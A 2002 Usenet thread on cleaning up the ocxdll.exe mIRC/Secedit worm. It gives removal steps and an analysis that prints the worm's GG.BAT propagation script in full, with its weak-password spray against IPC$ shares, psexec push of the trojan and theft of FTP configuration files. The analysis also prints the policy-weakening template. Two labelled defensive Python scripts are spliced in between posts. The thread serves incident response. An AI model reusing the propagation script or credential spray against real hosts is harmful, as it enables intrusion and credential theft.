
Solution to mIRC and Secedit Virus Networking Problems


Edward Alfert
Sep 3, 2002, 2:21:44 PM
First, sorry for crossposting to 4 newsgroups, but I have been following
threads in all 4 related to the recent outbreak of the mIRC/Secedit trojan...

Background: one of the largest and best customers of the company that I work
for has a small network consisting of several w2kpro computers networked as
a workgroup. They called me to ask for help after discovering 1) slow
internet speed and 2) networking problems. I discovered that at boot, a
program called mIRC (or an altered version of the popular program) was
being loaded, as well as the secedit utility being run.

After manually removing the trojan files (sorry, I don't have a complete
list... didn't think about documenting this part), I can reboot the systems
and nothing unusual gets loaded in memory or executed. Running Norton
Antivirus 2000 with the latest DAT shows the system is clean (...by the
way, contrary to posts I have seen, before cleaning the system Norton DID
detect the trojan as irc/trojan... I was using a DAT dated 8/28/02)...

NOW THE FUN PART....

1) Use the backup security database template to restore the system to its
original Microsoft defaults. (NOTE: if you upgraded from a previous OS,
this default may not be the default you are used to.)

cd %windir%\security\templates

Secedit /configure /cfg basicwk.inf /db basicwk.sdb /log basicwk.log /verbose

2) Copy /winnt/security/database/secedit.sdb to
/winnt/security/database/secedit-check.sdb

You need to do this because you can't run step #3 against the original
secedit.sdb.

3) Click on Start, Run, type mmc and click OK.

4) Click the Console menu, then Add/Remove Snap-In.

5) Click Add, then double click on "Security and Configuration Analysis" and
"Security Templates", then click Close, and OK.

6) Right click on "Security and Configuration Analysis" and click on "Open
Database"... browse to /winnt/security/database/secedit-check.sdb and
select it.

7) Right click on "Security and Configuration Analysis" and select
"Analyze Computer Now".

8) Browse through the directory structure and you will see that the
computer is currently configured differently.

Make changes as appropriate for your environment.

For example, a very important option that is probably missing (as caused by
the trojan) is that nobody is allowed to log on to the computer via the
network.

Go to "Security and Configuration Analysis"... then "Local Policy"... then
"User Rights Assignment"...

The first line, "Access this computer from the network", doesn't list any
user or group!... This is definitely NOT the default... the default is to
include the following: "Backup Operators, Power Users, Users,
Administrators, Everyone"....

Add these, and everything should now be fixed with "workgroup" networking.

If you have any questions, or need further help, reply to this thread
instead of the others... I will be monitoring this thread...


--
Edward Alfert
http://edward.alfert.com/ * http://www.sysadmin.info/
"Choose a job you love, and you will never have to work a day in your life."
- Unknown Sage

Edward Alfert
Sep 3, 2002, 2:27:26 PM
Edward Alfert wrote:

I forgot to mention that you need to apply your changes...

Right click on "Security and Configuration Analysis" and then "Configure
Computer Now"...

karl [x y]
Sep 4, 2002, 8:37:15 AM
"Edward Alfert" <edw...@alfert.com> wrote in message
news:al2vhv$1meprk$1...@ID-143141.news.dfncis.de...

>
> NOW THE FUN PART....
>
> 1) use the backup security database template to restore the system to its
> original microsoft defaults. (NOTE...if you upgrade from a previous OS,
> this default may not be the default you are used to)...
>
> cd %windir%\security\templates
>
> Secedit /configure /cfg basicwk.inf /db basicwk.sdb /log basicwk.log
> /verbose

Good work.

I personally would have imported both setup security.inf followed by
basicwk.inf into a security database and then done the compare using that.
Basicwk.inf by itself only contains a small subset [probably around half] of
the group policy settings that the worm could have changed, not all of them.
If the worm changed a setting that was not in the basicwk.inf, you never
would have found out about it and would not have yet removed it.

Edward Alfert
Sep 4, 2002, 8:38:54 AM
karl [x y] wrote:

Thanks for the information... I'll go back and see the other half that I
missed. But I did manually browse the security tree and didn't visually
see any other things that didn't look right to me... I had 2 computers side
by side... one known good that was never infected, and the infected
computers.

aladin
Sep 5, 2002, 4:49:16 AM
Hi Edward Alfert,
I referenced the steps you wrote in my document. They are nice steps
and, most importantly, they were tested and worked for many people. Great
job!

Here is my analysis:

Sorry guys if this is a repeat. I kind of need to make a correction
to the steps to restore security templates, and I just referenced
Edward Alfert's instructions:

More Analysis on ocxdll.exe virus: v. 1.1

Kyle Lai, CISSP, CISA
alad...@hotmail.com


+++++++++++++++++++++
This is an SMB over TCP attack, using port 445. It looked for
weak administrator IDs and passwords on the local
Windows 2000 systems.
+++++++++++++++++++++

One of my clients also got infected with the ocxdll.exe virus. This
occurred back on 8/28/2002 at 3am. After some detailed analysis, I
determined that it was a Trojan, deleted the detected registry
entries, deleted the infected files, tightened the local administrator
ID and password, restored the security policy by running "secedit.exe
/configure" (from Microsoft) to restore the security policy (if they
have a backup .sdb file, then just reapplying the security policy would
fix this part), and added users/groups back to the "Access this computer from
the network" policy. The cause was bad security (admin ID and
passwords) and firewall, and possibly a backdoor.

Affected systems:
- Windows 2000, XP (same port, 445, but not tested yet). Security
policy alteration was ONLY for Windows 2000 (and maybe on XP).
- Windows NT: might be infected as the "root problem" to spread the
trojan, but it will not get this Trojan based on its re-distribution
method. You probably want to look into this system to determine if
there are any backdoors, Trojans, or if this system was compromised in
any way. It will not change security policies.

What did it do?
++++++++++++
1. Hide all programs it ran.
2. Run mIRC client with random usernames listed in mdm.scr with more
random characters.
3. Open backdoor, port 60609.
4. It ran the bot (robot) scripts in the following order, which means
they contained malicious automated instructions.
[rfiles]
n0=nt32.ini
n1=dll16.ini
n2=nt32.ini
n3=dll32nt.hlp
n4=xvpll.hlp
n5=dll32.hlp
n6=httpsearch.ini

5. Replace security policy settings using the Microsoft security editor
(SecEdit.exe /configure) command to reset the security policy to
default settings, and replace some additional security settings using
the TFTP8675 file. This is done in quiet mode so it probably only
flashed the command line window very quickly.

6. It scans for 25 IPs and then starts running "GG.BAT". GG.BAT is
the REAL program that started the hacking.

7. It tries to hack into the system using the following user IDs and
passwords. If you don't have these user IDs and passwords, maybe you are just
infected with 1 system, and it could not spread via this Trojan/worm.
a. "administrator" with NO password
b. "administrator" with "administrator" password
c. "root" with "root" password
d. "admin" with "admin" password

8. If you have some guessable administrator IDs and passwords, then
probably these systems were hacked successfully. It copied the Trojan
OCXDLL.EXE to the compromised systems. If the file was there, copy it
anyway, and do it quietly. (using psexec.exe -c -f -d)

9. Run the OCXDLL.EXE without any delay (psexec.exe -d), which
extracted the 17 files that are in this self-extracting file.

10. It tries to copy "c:\progra~1\flashfxp\sites.dat" and
"c:\progra~1\ws_ftp\ws_ftp.ini" to the "c:\windows\system32" directory.
(maybe to get the configuration from the bot?)

11. Start "taskmngr.exe", which was really Mirc.EXE, an irc
client.

12. The scripts kicked in to HIDE the mirc window, so you can
ONLY see it in the process list. You will see "taskmngr.exe" (NOT
taskmgr.exe, which is the REAL task manager).

13. xvpll.hlp reports Trojan status back to the hacker: either
attempt failed or attempt successful.
++++++++++++
Disclaimer: The irc bot scripts have not been fully analyzed. This is
what I understood so far. The removal instructions WILL remove the
trojan.
++++++++++++

Impact:
+++++++++++++
This may be a random attack. However, there is a file, ncp.exe,
involved, which is the NetCat program. This program allows the
hackers to gain full control of your system.
Therefore,
1. Best-case scenario is that it was a hack, and no sensitive data
was lost.
2. Worst-case scenario is that they have controlled your system and
implemented something new that is not yet detected.

3. The hacker has captured your IP address and knows that you were
vulnerable because the Trojan actually reported back to him/her.
+++++++++++++

How to remove the Trojan:
++++++++++++++++++++
1. Delete files that were extracted from ocxdll.exe, plus ocxdll.exe
and dll16.ini (created when running mirc.exe):

Ocxdll.exe
Dll16.ini
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat (bat file to hack and copy Trojans)
httpsearch.ini (might show up as httpsear.ini due to 8.3 file format)
kill.exe (to kill process)
mdm.exe (to hide window program)
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp

++++++++++++
****NOTE:
seced.bat is a decoy. This file was never used. The real instruction
for updating the configuration was mentioned in item #5.
v.exe is actually srvany.exe, which is another decoy. It was never
used.
++++++++++++

2. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run:
remove "taskmngr.exe" (this starts the mirc client program during
Windows startup).
3. Change the LOCAL Administrator password on ALL systems! This
includes Windows 2000 PROFESSIONAL! Make sure the new passwords are
strong passwords! Use a mix of uppercase, lowercase, numbers, and
non-alphanumeric characters, i.e. _,+,=,), ... for your new passwords, and make sure
the passwords are NOT similar to the administrator ID in any way. For
example, "Administrator123" is a very bad password, even though it has mixed
case and alphanumerics.

4. If possible, change the Administrator login ID to a different user_id.
This will stop the initial user_id guessing. (This will not stop the
more sophisticated hackers.)

5. Restore the default security policy by restoring the basic
Microsoft default security template. The following instruction for
restoring the basic default security template is from the USENET posting
by Edward Alfert (edw...@alfert.com) under the topic "Solution to mIRC
and Secedit Virus Networking Problems." in
microsoft.public.scripting.virus.discussion. More info on Microsoft
Security Configuration and Analysis can be found at
http://www.microsoft.com/windows2000/en/advanced/help/default.asp?url=/windows2000/en/advanced/help/SCE_newconfig.htm

Here are the instructions from Edward Alfert.
================

cd %windir%\security\templates

================

6. Go to Start -> Programs -> Administrative Tools -> Local Security
Policy, click on "User Rights Assignments", and add users and groups back into the
"Access this computer from the network" policy. The default setting is:

a. IWAM_[SYSTEM_NAME]
b. ADMINISTRATORS
c. BACKUP OPERATORS
d. POWER USERS
e. USERS
f. EVERYONE
g. IUSR_[SYSTEM_NAME]

7. You MUST go through the security policies and make sure proper
access was restored. You or some of your applications might have had
specific rights settings prior to the compromise, and the user/group
privileges/rights need to be reset if necessary.

8. You probably have seen a strange SID that was added by the trojan
in the "Logon Locally" policy. Remove the user SID. The SID there does
NOT mean the trojan created a user. It was in the security template in the
TFTP8675 file. You can see it at the bottom of this document.

Additional Recommendation
1. Tighten your Firewall and lock down the ports and ACL, BOTH inside
to outside, and outside to inside. Make sure port TCP/UDP 445 is
blocked both inbound and outbound on the firewall.

2. If possible, Rename your administrator user id to something else,
and create a user id called "Administrator" with NO GROUPS associated
with it. This will allow you to monitor anyone from trying to use the
"Administrator" login.

3. Set up the security event log. Log successful and failed
Logon/Logoff to audit system access. Make sure to monitor the event
logs.
++++++++++++++++++++

More details:
Infection:
Registry entries:
- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run:
remove "taskmngr.exe" (this starts the mirc client program during
Windows startup).

When the mIRC client started running, it ran the scripts in dll32nt.hlp,
which in fact ran "secedit /configure /DB secedit.sdb /cfg $mircdir $+
tftp8675 /quiet". This meant "configure your system settings with the
existing security policy in secedit.sdb, plus the additional settings in
tftp8675". It basically removed many security restrictions, removed all
audits for the systems, and of course removed all users in "Local Users
allowed from the net".

OCXDLL.EXE is a self-extracting file that included 17 files. It is a
Trojan/worm. In dll32nt.hlp, it has an instruction to do an IP scan
and store the 25 IP addresses it found. Most likely it scanned the
subnet and file servers that were connected to the compromised system
at that time. Then the Trojan has an instruction at the end to run
GG.BAT, which is the instruction to attack the 25 IPs it just found.
Then the process started all over again.

Here are the files that were extracted from ocxdll.exe:
+++++++++++++++++++++++
ocxdll.exe
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat
httpsearch.ini
kill.exe
mdm.exe
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp
++++++++++++++++++++++++

Here is the GG.BAT text:
------------------------
@echo off
net use /del \\%1\ipc$
net use \\%1\ipc$ "" /user:administrator
net use \\%1\ipc$ "administrator" /user:administrator
net use \\%1\ipc$ "root" /user:root
net use \\%1\ipc$ "admin" /user:admin
psexec \\%1 attrib.exe -r ocxdll.exe
psexec \\%1 -d kill.exe temp.exe
psexec \\%1 -f -c -d ocxdll.exe -o
psexec \\%1 -d ocxdll.exe -o
psexec \\%1 cmd.exe /c copy c:\progra~1\flashfxp\sites.dat c:\winnt\system32\w%1.dat
psexec \\%1 -d taskmngr.exe
psexec \\%1 cmd.exe /c copy c:\progra~1\ws_ftp\ws_ftp.ini c:\winnt\system32\w%1.ini
psexec \\%1 -d taskmngr.exe
------------------------

-------------------------------------
From SysInternals, here is the description of what the PSEXEC
parameters do:
-c = Copy the specified program to the remote system for execution. If
you omit this option then the application must be in the system's path
on the remote system.
-f = Copy the specified program to the remote system even if the file
already exists on the remote system.
-d = Don't wait for application to terminate. Only use this option for
non-interactive applications.
---------------------------------------

List from TFTP8675:
----------------------
MinimumPasswordAge = 0
MaximumPasswordAge = 42
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ClearTextPassword = 0
[Event Audit]
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
[Registry Values]
machine\system\currentcontrolset\services\netlogon\parameters\signsecurechannel=4,1
machine\system\currentcontrolset\services\netlogon\parameters\sealsecurechannel=4,1
machine\system\currentcontrolset\services\netlogon\parameters\requirestrongkey=4,0
machine\system\currentcontrolset\services\netlogon\parameters\requiresignorseal=4,0
machine\system\currentcontrolset\services\netlogon\parameters\disablepasswordchange=4,0
machine\system\currentcontrolset\services\lanmanworkstation\parameters\requiresecuritysignature=4,0
machine\system\currentcontrolset\services\lanmanworkstation\parameters\enablesecuritysignature=4,1
machine\system\currentcontrolset\services\lanmanworkstation\parameters\enableplaintextpassword=4,0
machine\system\currentcontrolset\services\lanmanserver\parameters\requiresecuritysignature=4,0
machine\system\currentcontrolset\services\lanmanserver\parameters\enablesecuritysignature=4,0
machine\system\currentcontrolset\services\lanmanserver\parameters\enableforcedlogoff=4,1
machine\system\currentcontrolset\services\lanmanserver\parameters\autodisconnect=4,15
machine\system\currentcontrolset\control\session manager\protectionmode=4,1
machine\system\currentcontrolset\control\session manager\memory management\clearpagefileatshutdown=4,0
machine\system\currentcontrolset\control\print\providers\lanman print services\servers\addprinterdrivers=4,0
machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0
machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0
machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0
machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0
machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0
machine\software\microsoft\windows\currentversion\policies\system\shutdownwithoutlogon=4,1
machine\software\microsoft\windows\currentversion\policies\system\legalnoticetext=1,
machine\software\microsoft\windows\currentversion\policies\system\legalnoticecaption=1,
machine\software\microsoft\windows\currentversion\policies\system\dontdisplaylastusername=4,0
machine\software\microsoft\windows nt\currentversion\winlogon\scremoveoption=1,0
machine\software\microsoft\windows nt\currentversion\winlogon\passwordexpirywarning=4,14
machine\software\microsoft\windows nt\currentversion\winlogon\cachedlogonscount=1,10
machine\software\microsoft\windows nt\currentversion\winlogon\allocatefloppies=1,0
machine\software\microsoft\windows nt\currentversion\winlogon\allocatedasd=1,0
machine\software\microsoft\windows nt\currentversion\winlogon\allocatecdroms=1,0
machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\setcommand=4,0
machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\securitylevel=4,0
[Privilege Rights]
seassignprimarytokenprivilege =
seauditprivilege =
sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551
sebatchlogonright =
sechangenotifyprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0
secreatepagefileprivilege = *S-1-5-32-544
secreatepermanentprivilege =
secreatetokenprivilege =
sedebugprivilege = *S-1-5-32-544
sedenybatchlogonright =
sedenyinteractivelogonright =
sedenynetworklogonright =
sedenyservicelogonright =
seenabledelegationprivilege =
seincreasebasepriorityprivilege = *S-1-5-32-544
seincreasequotaprivilege = *S-1-5-32-544
seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501
seloaddriverprivilege = *S-1-5-32-544
selockmemoryprivilege =
semachineaccountprivilege =
senetworklogonright = Microsoft
seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547
seremoteshutdownprivilege = *S-1-5-32-544
serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551
sesecurityprivilege = *S-1-5-32-544
seservicelogonright =
seshutdownprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545
sesyncagentprivilege =
sesystemenvironmentprivilege = *S-1-5-32-544
sesystemprofileprivilege = *S-1-5-32-544
sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547
setakeownershipprivilege = *S-1-5-32-544
setcbprivilege =
--------------------------
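Both Edward's step 8 (comparing the current configuration against a known-good database) and Kyle's TFTP8675 listing come down to reading a secedit template and spotting what it loosens. The script below is an added example, not code from the thread or from either poster: it parses the [System Access], [Event Audit], [Registry Values] and [Privilege Rights] sections of a template in the layout that secedit /configure consumes and secedit /export writes, and reports the weakening visible in TFTP8675, including a SeNetworkLogonRight that holds no SIDs at all, auditing switched off, and a machine-local account SID in the interactive-logon right. The sample template is an excerpt constructed from the listing above; the set of default network-logon SIDs is the well-known BUILTIN/Everyone set behind the group names Edward lists; the severities and the idea of a "foreign SID" check are the example's own choices.

```python
"""Audit a secedit-style security template for the weakening TFTP8675 applies.

Added example, not code from the thread. Works on the plain-text .inf layout
that secedit /configure consumes and secedit /export writes.
"""

# Excerpt constructed from the TFTP8675 listing in the thread. The listing
# starts without a section header; secedit keeps the password-policy keys
# under [System Access], so keys seen before any header are filed there.
SAMPLE_TEMPLATE = r"""
MinimumPasswordLength = 0
PasswordComplexity = 0
LockoutBadCount = 0
[Event Audit]
AuditLogonEvents = 0
AuditAccountLogon = 0
[Registry Values]
machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0
machine\system\currentcontrolset\services\lanmanserver\parameters\requiresecuritysignature=4,0
[Privilege Rights]
seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501
senetworklogonright = Microsoft
sedebugprivilege = *S-1-5-32-544
"""

# Well-known SIDs behind the group names Edward lists as the Windows 2000
# default for "Access this computer from the network".
DEFAULT_NETWORK_LOGON = {
    "S-1-5-32-544",  # BUILTIN\Administrators
    "S-1-5-32-551",  # BUILTIN\Backup Operators
    "S-1-5-32-547",  # BUILTIN\Power Users
    "S-1-5-32-545",  # BUILTIN\Users
    "S-1-1-0",       # Everyone
}


def load_template(path):
    """secedit /export writes a UTF-16 file with a BOM; older templates are ANSI."""
    with open(path, "rb") as f:
        data = f.read()
    encoding = "utf-16" if data[:2] in (b"\xff\xfe", b"\xfe\xff") else "latin-1"
    return data.decode(encoding)


def parse_template(text):
    """Return {section: {key: value}} with keys lower-cased and values stripped."""
    sections = {}
    current = "System Access"  # keys before any [header] (password policy)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            continue
        key, sep, value = line.partition("=")
        if sep:
            sections.setdefault(current, {})[key.strip().lower()] = value.strip()
    return sections


def parse_sids(value):
    """'*S-1-5-32-544,*S-1-5-32-551' -> {'S-1-5-32-544', ...}; non-SID tokens are dropped."""
    return {tok.strip().lstrip("*") for tok in value.split(",") if tok.strip().startswith("*S-")}


def is_builtin(sid):
    """Machine- and domain-local accounts live under S-1-5-21-<authority>-<rid>."""
    return not sid.startswith("S-1-5-21-")


def audit_template(text):
    """Return [(severity, finding), ...] for settings that loosen the host."""
    t = parse_template(text)
    findings = []

    sa = t.get("System Access", {})
    if sa.get("passwordcomplexity") == "0":
        findings.append(("high", "PasswordComplexity disabled"))
    if sa.get("minimumpasswordlength") == "0":
        findings.append(("high", "MinimumPasswordLength is 0 (blank passwords allowed)"))
    if sa.get("lockoutbadcount") == "0":
        findings.append(("medium", "LockoutBadCount 0: password guessing is never throttled"))

    off = sorted(k for k, v in t.get("Event Audit", {}).items() if v == "0")
    if off:
        findings.append(("high", "auditing disabled for: " + ", ".join(off)))

    for path, val in t.get("Registry Values", {}).items():
        if path.endswith("\\lsa\\restrictanonymous") and val.endswith(",0"):
            findings.append(("medium", "RestrictAnonymous=0 (null-session enumeration allowed)"))
        if path.endswith("\\lanmanserver\\parameters\\requiresecuritysignature") and val.endswith(",0"):
            findings.append(("low", "SMB server signing not required"))

    rights = t.get("Privilege Rights", {})
    # "Microsoft" is not a SID, so the right ends up granted to nobody: Edward's symptom.
    missing = DEFAULT_NETWORK_LOGON - parse_sids(rights.get("senetworklogonright", ""))
    if missing:
        findings.append(("high", "SeNetworkLogonRight missing default SIDs: " + ", ".join(sorted(missing))))
    for sid in sorted(parse_sids(rights.get("seinteractivelogonright", ""))):
        if not is_builtin(sid):
            # In the sample this is RID 501, the Guest account of whatever machine built the template.
            findings.append(("medium", "machine-local account SID in SeInteractiveLogonRight: " + sid))
    return findings


if __name__ == "__main__":
    for severity, message in audit_template(SAMPLE_TEMPLATE):
        print(f"[{severity}] {message}")
```

To run it against a live host rather than the embedded excerpt, export the effective policy with `secedit /export /cfg current.inf` and pass `load_template("current.inf")` to `audit_template`; the same parser also reads a known-good export, so the two dictionaries from `parse_template` can be diffed section by section, which is what the snap-in's "Analyze Computer Now" does interactively.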

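Kyle's GG.BAT listing together with his recommendation to log successful and failed logons suggests a detection: the worm's four net use attempts against \\host\ipc$ show up on the target as a burst of network logons under administrator, root and admin from a single workstation, followed by a success if one of the passwords fit. The script below is an added example, not from the thread: it reads logon audit records, groups type-3 (network) attempts by workstation, splits them into bursts and reports every burst that cycles through those account names, noting which account, if any, succeeded. Windows 2000 records a failed logon as Security event 529 and a success as 528, each carrying the logon type and the caller's workstation name; the CSV column layout and the rows here are constructed for the example, and the 30-second burst window and the two-account threshold are the example's own choices.

```python
r"""Spot the GG.BAT credential spray in Windows 2000 logon audit records.

Added example, not from the thread. GG.BAT opens \\host\ipc$ as
administrator with a blank password, administrator/administrator, root/root
and admin/admin in one burst, then runs psexec. With "Audit logon events" on,
each failure is Security event 529 and a success is 528, both with logon type 3
(network) and the caller's workstation name. The CSV column layout and the
rows below are constructed for the example; map real exported events onto
these columns before use.
"""
import csv
from collections import defaultdict
from datetime import datetime, timedelta
from io import StringIO

SPRAY_USERS = {"administrator", "root", "admin"}  # the accounts GG.BAT cycles through
NETWORK_LOGON = 3                                 # logon type for SMB/IPC$ sessions
WINDOW = timedelta(seconds=30)                    # GG.BAT runs its net use lines back to back

# Constructed sample: a burst from WKS-07 that lands on "admin", an interactive
# mistype from WKS-02 (type 2, ignored), and an unrelated failure from WKS-03.
SAMPLE_LOG = """\
time,event_id,user,domain,logon_type,workstation
2002-08-28 03:00:01,529,administrator,SRV1,3,WKS-07
2002-08-28 03:00:01,529,administrator,SRV1,3,WKS-07
2002-08-28 03:00:02,529,root,SRV1,3,WKS-07
2002-08-28 03:00:02,528,admin,SRV1,3,WKS-07
2002-08-28 03:05:10,529,administrator,SRV1,2,WKS-02
2002-08-28 03:40:00,529,jsmith,SRV1,3,WKS-03
"""


def parse_records(text):
    """CSV text -> list of dicts with typed fields (user lower-cased for matching)."""
    records = []
    for row in csv.DictReader(StringIO(text)):
        records.append({
            "time": datetime.strptime(row["time"], "%Y-%m-%d %H:%M:%S"),
            "event_id": int(row["event_id"]),
            "user": row["user"].lower(),
            "logon_type": int(row["logon_type"]),
            "workstation": row["workstation"],
        })
    return records


def find_sprays(records, min_users=2):
    """Group network logons under the GG.BAT account names by workstation, split
    them into bursts where consecutive attempts are at most WINDOW apart, and
    report every burst that cycles through at least min_users distinct names.
    Each alert notes which account, if any, produced a 528 success."""
    by_ws = defaultdict(list)
    for r in records:
        if r["logon_type"] == NETWORK_LOGON and r["user"] in SPRAY_USERS:
            by_ws[r["workstation"]].append(r)

    alerts = []
    for ws, attempts in by_ws.items():
        attempts.sort(key=lambda r: r["time"])
        burst = [attempts[0]]
        for r in attempts[1:] + [None]:          # None flushes the last burst
            if r is not None and r["time"] - burst[-1]["time"] <= WINDOW:
                burst.append(r)
                continue
            users = sorted({b["user"] for b in burst})
            if len(users) >= min_users:
                successes = [b["user"] for b in burst if b["event_id"] == 528]
                alerts.append({
                    "workstation": ws,
                    "start": burst[0]["time"],
                    "attempts": len(burst),
                    "users": users,
                    "compromised_as": successes[0] if successes else None,
                })
            if r is not None:
                burst = [r]
    return alerts


if __name__ == "__main__":
    for a in find_sprays(parse_records(SAMPLE_LOG)):
        state = f"SUCCEEDED as {a['compromised_as']}" if a["compromised_as"] else "all failed"
        print(f"{a['start']} {a['workstation']}: {a['attempts']} attempts over "
              f"{', '.join(a['users'])} ({state})")
```

A burst that ends in a 528 is the case Kyle describes in item 8: the machine named in the alert now holds a copy of ocxdll.exe and should be treated as infected, not merely probed.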
Alison Taylor
Sep 23, 2002, 3:29:01 PM
Many thanks to both Edward and Kyle for information on this virus. I
have attempted to carry out all your suggestions since my computer was
infected several days ago.

I have some lingering problems and am wondering if anyone else has
seen these and can suggest fixes. The most notable problem is that my
computer reboots during bootup. The Win2000 login prompt comes up ok
and I log in to my account (which has administrator privileges, don't
know if that is relevant). Then the programs with icons in the
taskbar launch. During the launching of these programs, or
immediately after, the computer then reboots.

Another thing I noted was in the registry. Under
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run there
is an entry "Adobea" which was pointing to
C:\winnt\system32\adobes.exe, which Norton AntiVirus had identified as
an IRC Trojan. There does exist a file called Adobea.exe in the
system32 directory, but I don't know whether it is also a
trojan-created file or whether it needs to be there. I currently have
the adobea entry pointing to a non-existent file till I have this
sorted out.

I am not familiar enough with all the services to know which should be
disabled and which should be enabled. I am guessing that during my
attempts to rollback the changes made by the virus I have messed up my
services and registry settings, causing the crash on startup. I don't
need to allow anyone to log in remotely or provide any services to
remote users. Can anyone out there suggest a minimal list of services
to run?

Thanks for any replies,

Alison

alad...@hotmail.com (aladin) wrote in message news:<bf0f8e77.02090...@posting.google.com>...

Brian Mulrooney
Sep 23, 2002, 9:45:00 PM
Booting to SAFE MODE should start the minimum needed drivers and services.

"Alison Taylor" <alison...@canada.com> wrote in message
news:3c990e53.02092...@posting.google.com...

aladin
Sep 25, 2002, 11:35:11 AM
Alison,
I had a follow-up posting regarding ocxdll.exe a couple of weeks ago.
You can follow the additional suggestions in that posting. Make sure
you use some Anti-Trojan software to detect and clean up your system.
Anti-Virus software does not pick up many IRC-related trojans.

I like the Free Anti-Trojan software, SWAT-IT, by Lockdown Corp
(www.lockdowncorp.com.) Try it out. It should help you a lot in
terms of fighting trojans.

In terms of removing trojans, I definitely think you should rename the
suspected trojan file, and remove the registry entry "Adobea"

If possible, can you please send me the adobes.exe at ky...@kylelai.com
for analysis? Thanks!

Good luck!
/Kyle

Kyle Lai, CISSP, CISA, MCSE
Information Security Consultant
Kyle Lai Consulting
508-380-2022
ky...@kylelai.com


alison...@canada.com (Alison Taylor) wrote in message news:<3c990e53.02092...@posting.google.com>...

aladin
Sep 25, 2002, 11:50:39 AM